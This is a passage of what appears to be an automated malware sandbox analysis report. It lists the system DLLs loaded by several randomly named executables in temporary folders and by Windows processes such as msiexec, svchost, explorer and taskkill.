                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: apphelp.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: samcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: taskschd.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: samlib.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dll
                      Source: C:\Windows\explorer.exeSection loaded: secur32.dll
                      Source: C:\Windows\explorer.exeSection loaded: version.dll
                      Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                      Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                      Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                      Source: C:\Windows\explorer.exeSection loaded: cdprt.dll
                      Source: C:\Windows\explorer.exeSection loaded: wpnapps.dll
                      Source: C:\Windows\explorer.exeSection loaded: provsvc.dll
                      Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: msvcr100.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: linkinfo.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: ntshrui.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSection loaded: cscapi.dll
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
